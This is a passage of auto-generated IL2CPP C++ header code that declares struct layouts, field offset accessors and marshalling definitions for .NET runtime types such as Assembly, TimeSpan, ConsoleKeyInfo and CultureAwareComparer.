Il2CppCodeGenWriteBarrier((&____evidence_2), value); } inline static int32_t get_offset_of__minimum_3() { return static_cast<int32_t>(offsetof(Assembly_t, ____minimum_3)); } inline RuntimeObject * get__minimum_3() const { return ____minimum_3; } inline RuntimeObject ** get_address_of__minimum_3() { return &____minimum_3; } inline void set__minimum_3(RuntimeObject * value) { ____minimum_3 = value; Il2CppCodeGenWriteBarrier((&____minimum_3), value); } inline static int32_t get_offset_of__optional_4() { return static_cast<int32_t>(offsetof(Assembly_t, ____optional_4)); } inline RuntimeObject * get__optional_4() const { return ____optional_4; } inline RuntimeObject ** get_address_of__optional_4() { return &____optional_4; } inline void set__optional_4(RuntimeObject * value) { ____optional_4 = value; Il2CppCodeGenWriteBarrier((&____optional_4), value); } inline static int32_t get_offset_of__refuse_5() { return static_cast<int32_t>(offsetof(Assembly_t, ____refuse_5)); } inline RuntimeObject * get__refuse_5() const { return ____refuse_5; } inline RuntimeObject ** get_address_of__refuse_5() { return &____refuse_5; } inline void set__refuse_5(RuntimeObject * value) { ____refuse_5 = value; Il2CppCodeGenWriteBarrier((&____refuse_5), value); } inline static int32_t get_offset_of__granted_6() { return static_cast<int32_t>(offsetof(Assembly_t, ____granted_6)); } inline RuntimeObject * get__granted_6() const { return ____granted_6; } inline RuntimeObject ** get_address_of__granted_6() { return &____granted_6; } inline void set__granted_6(RuntimeObject * value) { ____granted_6 = value; Il2CppCodeGenWriteBarrier((&____granted_6), value); } inline static int32_t get_offset_of__denied_7() { return static_cast<int32_t>(offsetof(Assembly_t, ____denied_7)); } inline RuntimeObject * get__denied_7() const { return ____denied_7; } inline RuntimeObject ** get_address_of__denied_7() { return &____denied_7; } inline void set__denied_7(RuntimeObject * value) { ____denied_7 = value; Il2CppCodeGenWriteBarrier((&____denied_7), value); } inline static int32_t get_offset_of_fromByteArray_8() { return static_cast<int32_t>(offsetof(Assembly_t, ___fromByteArray_8)); } inline bool get_fromByteArray_8() const { return ___fromByteArray_8; } inline bool* get_address_of_fromByteArray_8() { return &___fromByteArray_8; } inline void set_fromByteArray_8(bool value) { ___fromByteArray_8 = value; } inline static int32_t get_offset_of_assemblyName_9() { return static_cast<int32_t>(offsetof(Assembly_t, ___assemblyName_9)); } inline String_t* get_assemblyName_9() const { return ___assemblyName_9; } inline String_t** get_address_of_assemblyName_9() { return &___assemblyName_9; } inline void set_assemblyName_9(String_t* value) { ___assemblyName_9 = value; Il2CppCodeGenWriteBarrier((&___assemblyName_9), value); } }; #ifdef __clang__ #pragma clang diagnostic pop #endif // Native definition for P/Invoke marshalling of System.Reflection.Assembly struct Assembly_t_marshaled_pinvoke { intptr_t ____mono_assembly_0; ResolveEventHolder_t5267893EB7CB9C12F7B9B463FD4C221BEA03326E * ___resolve_event_holder_1; Il2CppIUnknown* ____evidence_2; Il2CppIUnknown* ____minimum_3; Il2CppIUnknown* ____optional_4; Il2CppIUnknown* ____refuse_5; Il2CppIUnknown* ____granted_6; Il2CppIUnknown* ____denied_7; int32_t ___fromByteArray_8; char* ___assemblyName_9; }; // Native definition for COM marshalling of System.Reflection.Assembly struct Assembly_t_marshaled_com { intptr_t ____mono_assembly_0; ResolveEventHolder_t5267893EB7CB9C12F7B9B463FD4C221BEA03326E * ___resolve_event_holder_1; Il2CppIUnknown* ____evidence_2; Il2CppIUnknown* ____minimum_3; Il2CppIUnknown* ____optional_4; Il2CppIUnknown* ____refuse_5; Il2CppIUnknown* ____granted_6; Il2CppIUnknown* ____denied_7; int32_t ___fromByteArray_8; Il2CppChar* ___assemblyName_9; }; #endif // ASSEMBLY_T_H #ifndef BINDINGFLAGS_TE35C91D046E63A1B92BB9AB909FCF9DA84379ED0_H #define BINDINGFLAGS_TE35C91D046E63A1B92BB9AB909FCF9DA84379ED0_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Reflection.BindingFlags struct BindingFlags_tE35C91D046E63A1B92BB9AB909FCF9DA84379ED0 { public: // System.Int32 System.Reflection.BindingFlags::value__ int32_t ___value___2; public: inline static int32_t get_offset_of_value___2() { return static_cast<int32_t>(offsetof(BindingFlags_tE35C91D046E63A1B92BB9AB909FCF9DA84379ED0, ___value___2)); } inline int32_t get_value___2() const { return ___value___2; } inline int32_t* get_address_of_value___2() { return &___value___2; } inline void set_value___2(int32_t value) { ___value___2 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // BINDINGFLAGS_TE35C91D046E63A1B92BB9AB909FCF9DA84379ED0_H #ifndef SERIALIZATIONEXCEPTION_TA1FDFF6779406E688C2192E71C38DBFD7A4A2210_H #define SERIALIZATIONEXCEPTION_TA1FDFF6779406E688C2192E71C38DBFD7A4A2210_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Runtime.Serialization.SerializationException struct SerializationException_tA1FDFF6779406E688C2192E71C38DBFD7A4A2210 : public SystemException_t5380468142AA850BE4A341D7AF3EAB9C78746782 { public: public: }; struct SerializationException_tA1FDFF6779406E688C2192E71C38DBFD7A4A2210_StaticFields { public: // System.String System.Runtime.Serialization.SerializationException::_nullMessage String_t* ____nullMessage_17; public: inline static int32_t get_offset_of__nullMessage_17() { return static_cast<int32_t>(offsetof(SerializationException_tA1FDFF6779406E688C2192E71C38DBFD7A4A2210_StaticFields, ____nullMessage_17)); } inline String_t* get__nullMessage_17() const { return ____nullMessage_17; } inline String_t** get_address_of__nullMessage_17() { return &____nullMessage_17; } inline void set__nullMessage_17(String_t* value) { ____nullMessage_17 = value; Il2CppCodeGenWriteBarrier((&____nullMessage_17), value); } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // SERIALIZATIONEXCEPTION_TA1FDFF6779406E688C2192E71C38DBFD7A4A2210_H #ifndef STREAMINGCONTEXTSTATES_T6D16CD7BC584A66A29B702F5FD59DF62BB1BDD3F_H #define STREAMINGCONTEXTSTATES_T6D16CD7BC584A66A29B702F5FD59DF62BB1BDD3F_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Runtime.Serialization.StreamingContextStates struct StreamingContextStates_t6D16CD7BC584A66A29B702F5FD59DF62BB1BDD3F { public: // System.Int32 System.Runtime.Serialization.StreamingContextStates::value__ int32_t ___value___2; public: inline static int32_t get_offset_of_value___2() { return static_cast<int32_t>(offsetof(StreamingContextStates_t6D16CD7BC584A66A29B702F5FD59DF62BB1BDD3F, ___value___2)); } inline int32_t get_value___2() const { return ___value___2; } inline int32_t* get_address_of_value___2() { return &___value___2; } inline void set_value___2(int32_t value) { ___value___2 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // STREAMINGCONTEXTSTATES_T6D16CD7BC584A66A29B702F5FD59DF62BB1BDD3F_H #ifndef RUNTIMEFIELDHANDLE_T844BDF00E8E6FE69D9AEAA7657F09018B864F4EF_H #define RUNTIMEFIELDHANDLE_T844BDF00E8E6FE69D9AEAA7657F09018B864F4EF_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.RuntimeFieldHandle struct RuntimeFieldHandle_t844BDF00E8E6FE69D9AEAA7657F09018B864F4EF { public: // System.IntPtr System.RuntimeFieldHandle::value intptr_t ___value_0; public: inline static int32_t get_offset_of_value_0() { return static_cast<int32_t>(offsetof(RuntimeFieldHandle_t844BDF00E8E6FE69D9AEAA7657F09018B864F4EF, ___value_0)); } inline intptr_t get_value_0() const { return ___value_0; } inline intptr_t* get_address_of_value_0() { return &___value_0; } inline void set_value_0(intptr_t value) { ___value_0 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // RUNTIMEFIELDHANDLE_T844BDF00E8E6FE69D9AEAA7657F09018B864F4EF_H #ifndef RUNTIMETYPEHANDLE_T7B542280A22F0EC4EAC2061C29178845847A8B2D_H #define RUNTIMETYPEHANDLE_T7B542280A22F0EC4EAC2061C29178845847A8B2D_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.RuntimeTypeHandle struct RuntimeTypeHandle_t7B542280A22F0EC4EAC2061C29178845847A8B2D { public: // System.IntPtr System.RuntimeTypeHandle::value intptr_t ___value_0; public: inline static int32_t get_offset_of_value_0() { return static_cast<int32_t>(offsetof(RuntimeTypeHandle_t7B542280A22F0EC4EAC2061C29178845847A8B2D, ___value_0)); } inline intptr_t get_value_0() const { return ___value_0; } inline intptr_t* get_address_of_value_0() { return &___value_0; } inline void set_value_0(intptr_t value) { ___value_0 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // RUNTIMETYPEHANDLE_T7B542280A22F0EC4EAC2061C29178845847A8B2D_H #ifndef STRINGCOMPARISON_T02BAA95468CE9E91115C604577611FDF58FEDCF0_H #define STRINGCOMPARISON_T02BAA95468CE9E91115C604577611FDF58FEDCF0_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.StringComparison struct StringComparison_t02BAA95468CE9E91115C604577611FDF58FEDCF0 { public: // System.Int32 System.StringComparison::value__ int32_t ___value___2; public: inline static int32_t get_offset_of_value___2() { return static_cast<int32_t>(offsetof(StringComparison_t02BAA95468CE9E91115C604577611FDF58FEDCF0, ___value___2)); } inline int32_t get_value___2() const { return ___value___2; } inline int32_t* get_address_of_value___2() { return &___value___2; } inline void set_value___2(int32_t value) { ___value___2 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // STRINGCOMPARISON_T02BAA95468CE9E91115C604577611FDF58FEDCF0_H #ifndef TIMESPAN_TA8069278ACE8A74D6DF7D514A9CD4432433F64C4_H #define TIMESPAN_TA8069278ACE8A74D6DF7D514A9CD4432433F64C4_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.TimeSpan struct TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 { public: // System.Int64 System.TimeSpan::_ticks int64_t ____ticks_3; public: inline static int32_t get_offset_of__ticks_3() { return static_cast<int32_t>(offsetof(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4, ____ticks_3)); } inline int64_t get__ticks_3() const { return ____ticks_3; } inline int64_t* get_address_of__ticks_3() { return &____ticks_3; } inline void set__ticks_3(int64_t value) { ____ticks_3 = value; } }; struct TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_StaticFields { public: // System.TimeSpan System.TimeSpan::Zero TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 ___Zero_0; // System.TimeSpan System.TimeSpan::MaxValue TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 ___MaxValue_1; // System.TimeSpan System.TimeSpan::MinValue TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 ___MinValue_2; // System.Boolean modreq(System.Runtime.CompilerServices.IsVolatile) System.TimeSpan::_legacyConfigChecked bool ____legacyConfigChecked_4; // System.Boolean modreq(System.Runtime.CompilerServices.IsVolatile) System.TimeSpan::_legacyMode bool ____legacyMode_5; public: inline static int32_t get_offset_of_Zero_0() { return static_cast<int32_t>(offsetof(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_StaticFields, ___Zero_0)); } inline TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 get_Zero_0() const { return ___Zero_0; } inline TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 * get_address_of_Zero_0() { return &___Zero_0; } inline void set_Zero_0(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 value) { ___Zero_0 = value; } inline static int32_t get_offset_of_MaxValue_1() { return static_cast<int32_t>(offsetof(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_StaticFields, ___MaxValue_1)); } inline TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 get_MaxValue_1() const { return ___MaxValue_1; } inline TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 * get_address_of_MaxValue_1() { return &___MaxValue_1; } inline void set_MaxValue_1(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 value) { ___MaxValue_1 = value; } inline static int32_t get_offset_of_MinValue_2() { return static_cast<int32_t>(offsetof(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_StaticFields, ___MinValue_2)); } inline TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 get_MinValue_2() const { return ___MinValue_2; } inline TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 * get_address_of_MinValue_2() { return &___MinValue_2; } inline void set_MinValue_2(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 value) { ___MinValue_2 = value; } inline static int32_t get_offset_of__legacyConfigChecked_4() { return static_cast<int32_t>(offsetof(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_StaticFields, ____legacyConfigChecked_4)); } inline bool get__legacyConfigChecked_4() const { return ____legacyConfigChecked_4; } inline bool* get_address_of__legacyConfigChecked_4() { return &____legacyConfigChecked_4; } inline void set__legacyConfigChecked_4(bool value) { ____legacyConfigChecked_4 = value; } inline static int32_t get_offset_of__legacyMode_5() { return static_cast<int32_t>(offsetof(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_StaticFields, ____legacyMode_5)); } inline bool get__legacyMode_5() const { return ____legacyMode_5; } inline bool* get_address_of__legacyMode_5() { return &____legacyMode_5; } inline void set__legacyMode_5(bool value) { ____legacyMode_5 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // TIMESPAN_TA8069278ACE8A74D6DF7D514A9CD4432433F64C4_H #ifndef TIMEZONEINFOOPTIONS_T123D8B5A23D3DE107FB9D3A29BF5952895C652EE_H #define TIMEZONEINFOOPTIONS_T123D8B5A23D3DE107FB9D3A29BF5952895C652EE_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.TimeZoneInfoOptions struct TimeZoneInfoOptions_t123D8B5A23D3DE107FB9D3A29BF5952895C652EE { public: // System.Int32 System.TimeZoneInfoOptions::value__ int32_t ___value___2; public: inline static int32_t get_offset_of_value___2() { return static_cast<int32_t>(offsetof(TimeZoneInfoOptions_t123D8B5A23D3DE107FB9D3A29BF5952895C652EE, ___value___2)); } inline int32_t get_value___2() const { return ___value___2; } inline int32_t* get_address_of_value___2() { return &___value___2; } inline void set_value___2(int32_t value) { ___value___2 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // TIMEZONEINFOOPTIONS_T123D8B5A23D3DE107FB9D3A29BF5952895C652EE_H #ifndef TOKENTYPE_T192580F19CFCC8A71F0BD44B8BE1056BA64D869A_H #define TOKENTYPE_T192580F19CFCC8A71F0BD44B8BE1056BA64D869A_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.TokenType struct TokenType_t192580F19CFCC8A71F0BD44B8BE1056BA64D869A { public: // System.Int32 System.TokenType::value__ int32_t ___value___2; public: inline static int32_t get_offset_of_value___2() { return static_cast<int32_t>(offsetof(TokenType_t192580F19CFCC8A71F0BD44B8BE1056BA64D869A, ___value___2)); } inline int32_t get_value___2() const { return ___value___2; } inline int32_t* get_address_of_value___2() { return &___value___2; } inline void set_value___2(int32_t value) { ___value___2 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // TOKENTYPE_T192580F19CFCC8A71F0BD44B8BE1056BA64D869A_H #ifndef TYPECODE_T03ED52F888000DAF40C550C434F29F39A23D61C6_H #define TYPECODE_T03ED52F888000DAF40C550C434F29F39A23D61C6_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.TypeCode struct TypeCode_t03ED52F888000DAF40C550C434F29F39A23D61C6 { public: // System.Int32 System.TypeCode::value__ int32_t ___value___2; public: inline static int32_t get_offset_of_value___2() { return static_cast<int32_t>(offsetof(TypeCode_t03ED52F888000DAF40C550C434F29F39A23D61C6, ___value___2)); } inline int32_t get_value___2() const { return ___value___2; } inline int32_t* get_address_of_value___2() { return &___value___2; } inline void set_value___2(int32_t value) { ___value___2 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // TYPECODE_T03ED52F888000DAF40C550C434F29F39A23D61C6_H #ifndef WINDOWSCONSOLEDRIVER_T953AB92956013BD3ED7E260FEC4944E603008B42_H #define WINDOWSCONSOLEDRIVER_T953AB92956013BD3ED7E260FEC4944E603008B42_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.WindowsConsoleDriver struct WindowsConsoleDriver_t953AB92956013BD3ED7E260FEC4944E603008B42 : public RuntimeObject { public: // System.IntPtr System.WindowsConsoleDriver::inputHandle intptr_t ___inputHandle_0; // System.IntPtr System.WindowsConsoleDriver::outputHandle intptr_t ___outputHandle_1; // System.Int16 System.WindowsConsoleDriver::defaultAttribute int16_t ___defaultAttribute_2; public: inline static int32_t get_offset_of_inputHandle_0() { return static_cast<int32_t>(offsetof(WindowsConsoleDriver_t953AB92956013BD3ED7E260FEC4944E603008B42, ___inputHandle_0)); } inline intptr_t get_inputHandle_0() const { return ___inputHandle_0; } inline intptr_t* get_address_of_inputHandle_0() { return &___inputHandle_0; } inline void set_inputHandle_0(intptr_t value) { ___inputHandle_0 = value; } inline static int32_t get_offset_of_outputHandle_1() { return static_cast<int32_t>(offsetof(WindowsConsoleDriver_t953AB92956013BD3ED7E260FEC4944E603008B42, ___outputHandle_1)); } inline intptr_t get_outputHandle_1() const { return ___outputHandle_1; } inline intptr_t* get_address_of_outputHandle_1() { return &___outputHandle_1; } inline void set_outputHandle_1(intptr_t value) { ___outputHandle_1 = value; } inline static int32_t get_offset_of_defaultAttribute_2() { return static_cast<int32_t>(offsetof(WindowsConsoleDriver_t953AB92956013BD3ED7E260FEC4944E603008B42, ___defaultAttribute_2)); } inline int16_t get_defaultAttribute_2() const { return ___defaultAttribute_2; } inline int16_t* get_address_of_defaultAttribute_2() { return &___defaultAttribute_2; } inline void set_defaultAttribute_2(int16_t value) { ___defaultAttribute_2 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // WINDOWSCONSOLEDRIVER_T953AB92956013BD3ED7E260FEC4944E603008B42_H #ifndef ARGUMENTNULLEXCEPTION_T581DF992B1F3E0EC6EFB30CC5DC43519A79B27AD_H #define ARGUMENTNULLEXCEPTION_T581DF992B1F3E0EC6EFB30CC5DC43519A79B27AD_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.ArgumentNullException struct ArgumentNullException_t581DF992B1F3E0EC6EFB30CC5DC43519A79B27AD : public ArgumentException_tEDCD16F20A09ECE461C3DA766C16EDA8864057D1 { public: public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // ARGUMENTNULLEXCEPTION_T581DF992B1F3E0EC6EFB30CC5DC43519A79B27AD_H #ifndef ARGUMENTOUTOFRANGEEXCEPTION_T94D19DF918A54511AEDF4784C9A08741BAD1DEDA_H #define ARGUMENTOUTOFRANGEEXCEPTION_T94D19DF918A54511AEDF4784C9A08741BAD1DEDA_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.ArgumentOutOfRangeException struct ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA : public ArgumentException_tEDCD16F20A09ECE461C3DA766C16EDA8864057D1 { public: // System.Object System.ArgumentOutOfRangeException::m_actualValue RuntimeObject * ___m_actualValue_19; public: inline static int32_t get_offset_of_m_actualValue_19() { return static_cast<int32_t>(offsetof(ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA, ___m_actualValue_19)); } inline RuntimeObject * get_m_actualValue_19() const { return ___m_actualValue_19; } inline RuntimeObject ** get_address_of_m_actualValue_19() { return &___m_actualValue_19; } inline void set_m_actualValue_19(RuntimeObject * value) { ___m_actualValue_19 = value; Il2CppCodeGenWriteBarrier((&___m_actualValue_19), value); } }; struct ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA_StaticFields { public: // System.String modreq(System.Runtime.CompilerServices.IsVolatile) System.ArgumentOutOfRangeException::_rangeMessage String_t* ____rangeMessage_18; public: inline static int32_t get_offset_of__rangeMessage_18() { return static_cast<int32_t>(offsetof(ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA_StaticFields, ____rangeMessage_18)); } inline String_t* get__rangeMessage_18() const { return ____rangeMessage_18; } inline String_t** get_address_of__rangeMessage_18() { return &____rangeMessage_18; } inline void set__rangeMessage_18(String_t* value) { ____rangeMessage_18 = value; Il2CppCodeGenWriteBarrier((&____rangeMessage_18), value); } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // ARGUMENTOUTOFRANGEEXCEPTION_T94D19DF918A54511AEDF4784C9A08741BAD1DEDA_H #ifndef CONSOLECANCELEVENTARGS_T2B351DE0A5B10D5CA5E93A7AE36C16DB17D73760_H #define CONSOLECANCELEVENTARGS_T2B351DE0A5B10D5CA5E93A7AE36C16DB17D73760_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.ConsoleCancelEventArgs struct ConsoleCancelEventArgs_t2B351DE0A5B10D5CA5E93A7AE36C16DB17D73760 : public EventArgs_t8E6CA180BE0E56674C6407011A94BAF7C757352E { public: // System.ConsoleSpecialKey System.ConsoleCancelEventArgs::_type int32_t ____type_1; // System.Boolean System.ConsoleCancelEventArgs::_cancel bool ____cancel_2; public: inline static int32_t get_offset_of__type_1() { return static_cast<int32_t>(offsetof(ConsoleCancelEventArgs_t2B351DE0A5B10D5CA5E93A7AE36C16DB17D73760, ____type_1)); } inline int32_t get__type_1() const { return ____type_1; } inline int32_t* get_address_of__type_1() { return &____type_1; } inline void set__type_1(int32_t value) { ____type_1 = value; } inline static int32_t get_offset_of__cancel_2() { return static_cast<int32_t>(offsetof(ConsoleCancelEventArgs_t2B351DE0A5B10D5CA5E93A7AE36C16DB17D73760, ____cancel_2)); } inline bool get__cancel_2() const { return ____cancel_2; } inline bool* get_address_of__cancel_2() { return &____cancel_2; } inline void set__cancel_2(bool value) { ____cancel_2 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // CONSOLECANCELEVENTARGS_T2B351DE0A5B10D5CA5E93A7AE36C16DB17D73760_H #ifndef CONSOLEKEYINFO_T5BE3CE05E8258CDB5404256E96AF7C22BC5DE768_H #define CONSOLEKEYINFO_T5BE3CE05E8258CDB5404256E96AF7C22BC5DE768_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.ConsoleKeyInfo struct ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768 { public: // System.Char System.ConsoleKeyInfo::_keyChar Il2CppChar ____keyChar_0; // System.ConsoleKey System.ConsoleKeyInfo::_key int32_t ____key_1; // System.ConsoleModifiers System.ConsoleKeyInfo::_mods int32_t ____mods_2; public: inline static int32_t get_offset_of__keyChar_0() { return static_cast<int32_t>(offsetof(ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768, ____keyChar_0)); } inline Il2CppChar get__keyChar_0() const { return ____keyChar_0; } inline Il2CppChar* get_address_of__keyChar_0() { return &____keyChar_0; } inline void set__keyChar_0(Il2CppChar value) { ____keyChar_0 = value; } inline static int32_t get_offset_of__key_1() { return static_cast<int32_t>(offsetof(ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768, ____key_1)); } inline int32_t get__key_1() const { return ____key_1; } inline int32_t* get_address_of__key_1() { return &____key_1; } inline void set__key_1(int32_t value) { ____key_1 = value; } inline static int32_t get_offset_of__mods_2() { return static_cast<int32_t>(offsetof(ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768, ____mods_2)); } inline int32_t get__mods_2() const { return ____mods_2; } inline int32_t* get_address_of__mods_2() { return &____mods_2; } inline void set__mods_2(int32_t value) { ____mods_2 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif // Native definition for P/Invoke marshalling of System.ConsoleKeyInfo struct ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768_marshaled_pinvoke { uint8_t ____keyChar_0; int32_t ____key_1; int32_t ____mods_2; }; // Native definition for COM marshalling of System.ConsoleKeyInfo struct ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768_marshaled_com { uint8_t ____keyChar_0; int32_t ____key_1; int32_t ____mods_2; }; #endif // CONSOLEKEYINFO_T5BE3CE05E8258CDB5404256E96AF7C22BC5DE768_H #ifndef CULTUREAWARECOMPARER_TFCEC16B02A638A8DFF49C7C8C507A6A889C8E058_H #define CULTUREAWARECOMPARER_TFCEC16B02A638A8DFF49C7C8C507A6A889C8E058_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.CultureAwareComparer struct CultureAwareComparer_tFCEC16B02A638A8DFF49C7C8C507A6A889C8E058 : public StringComparer_t588BC7FEF85D6E7425E0A8147A3D5A334F1F82DE { public: // System.Globalization.CompareInfo System.CultureAwareComparer::_compareInfo CompareInfo_tB9A071DBC11AC00AF2EA2066D0C2AE1DCB1865D1 * ____compareInfo_4; // System.Boolean System.CultureAwareComparer::_ignoreCase bool ____ignoreCase_5; // System.Globalization.CompareOptions System.CultureAwareComparer::_options int32_t ____options_6; public: inline static int32_t get_offset_of__compareInfo_4() { return static_cast<int32_t>(offsetof(CultureAwareComparer_tFCEC16B02A638A8DFF49C7C8C507A6A889C8E058, ____compareInfo_4)); } inline CompareInfo_tB9A071DBC11AC00AF2EA2066D0C2AE1DCB1865D1 * get__compareInfo_4() const { return ____compareInfo_4; } inline CompareInfo_tB9A071DBC11AC00AF2EA2066D0C2AE1DCB1865D1 ** get_address_of__compareInfo_4() { return &____compareInfo_4; } inline void set__compareInfo_4(CompareInfo_tB9A071DBC11AC00AF2EA2066D0C2AE1DCB1865D1 * value) { ____compareInfo_4 = value; Il2CppCodeGenWriteBarrier((&____compareInfo_4), value); } inline static int32_t get_offset_of__ignoreCase_5() { return static_cast<int32_t>(offsetof(CultureAwareComparer_tFCEC16B02A638A8DFF49C7C8C507A6A889C8E058, ____ignoreCase_5)); } inline bool get__ignoreCase_5() const { return ____ignoreCase_5; } inline bool* get_address_of__ignoreCase_5() { return &____ignoreCase_5; } inline void set__ignoreCase_5(bool value) { ____ignoreCase_5 = value; } inline static int32_t get_offset_of__options_6() { return static_cast<int32_t>(offsetof(CultureAwareComparer_tFCEC16B02A638A8DFF49C7C8C507A6A889C8E058, ____options_6)); } inline int32_t get__options_6() const { return ____options_6; } inline int32_t* get_address_of__options_6() { return &____options_6; } inline void set__options_6(int32_t value) { ____options_6 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // CULTUREAWARECOMPARER_TFCEC16B02A638A8DFF49C7C8C507A6A889C8E058_H #ifndef DTSUBSTRING_T0B5F9998AD0833CCE29248DE20EFEBFE9EBFB93D_H #define DTSUBSTRING_T0B5F9998AD0833CCE29248DE20EFEBFE9EBFB93D_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.DTSubString struct DTSubString_t0B5F9998AD0833CCE29248DE20EFEBFE9EBFB93D { public: // System.String System.DTSubString::s String_t* ___s_0; // System.Int32 System.DTSubString::index int32_t ___index_1; // System.Int32 System.DTSubString::length int32_t ___length_2; // System.DTSubStringType System.DTSubString::type int32_t ___type_3; // System.Int32 System.DTSubString::value int32_t ___value_4; public: inline static int32_t get_offset_of_s_0() { return static_cast<int32_t>(offsetof(DTSubString_t0B5F9998AD0833CCE29248DE20EFEBFE9EBFB93D, ___s_0)); } inline String_t* get_s_0() const { return ___s_0; } inline String_t** get_address_of_s_0() { return &___s_0; } inline void set_s_0(String_t* value) { ___s_0 = value; Il2CppCodeGenWriteBarrier((&___s_0), value); } inline static int32_t get_offset_of_index_1() { return static_cast<int32_t>(offsetof(DTSubString_t0B5F9998AD0833CCE29248DE20EFEBFE9EBFB93D, ___index_1)); } inline int32_t get_index_1() const { return ___index_1; } inline int32_t* get_address_of_index_1() { return &___index_1; } inline void set_index_1(int32_t value) { ___index_1 = value; } inline static int32_t get_offset_of_length_2() { return static_cast<int32_t>(offsetof(DTSubString_t0B5F9998AD0833CCE29248DE20EFEBFE9EBFB93D, ___length_2)); } inline int32_t get_length_2() const { return ___length_2; } inline int32_t* get_address_of_length_2() { return &___length_2; } 